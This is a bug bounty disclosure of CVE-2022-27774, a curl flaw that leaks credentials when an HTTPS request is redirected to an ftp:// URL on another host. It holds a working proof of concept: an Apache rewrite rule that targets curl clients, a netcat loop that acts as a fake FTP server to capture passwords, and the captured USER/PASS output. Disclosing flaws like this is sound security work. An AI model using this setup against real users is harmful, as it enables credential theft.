Internet Bug Bounty: CVE-2022-27774: Credential leak on redirect

Summary:

curl/libcurl can be coaxed to leak user credentials to third-party host by issuing HTTP redirect to ftp:// URL.

Steps To Reproduce:

1. Configure for example Apache2 on firstsite.tld to perform redirect with mod_rewrite:

RewriteCond %{HTTP_USER_AGENT} "^curl/"
RewriteRule ^/redirectpoc ftp://secondsite.tld:9999 [R=301,L]
 ```

2. Capture credentials at secondsite.tld for example with:

   while true; do echo -e "220 pocftp\n331 plz\n530 bye" | nc -v -l -p 9999; done
   

3. curl -L --user foo https://firstsite.tld/redirectpoc
4. The entered password is visible in the fake FTP server:

Listening on 0.0.0.0 9999
Connection received on somehost someport
USER foo
PASS secretpassword

There are several issues here:

1. The credentials are sent to a completely different host than the original host (firstsite.tld vs secondsite.tld). This is definitely not what the user could expect, considering the documentation says:
   > When authentication is used, curl only sends its credentials to the initial host. If a redirect takes curl to a different host, it will not be able to intercept the user+password. See also --location-trusted on how to change this.
2. The redirect crosses from secure context (HTTPS) to insecure one (FTP). That is the credentials are unexpectedly sent over insecure channels even when the URL specified is using HTTPS.

In addition, TLS SRP user credentials (CURLOPT_TLSAUTH_USERNAME and CURLOPT_TLSAUTH_PASSWORD) are also leaked on redirects.

Impact

Leak of confidential information (user credentials).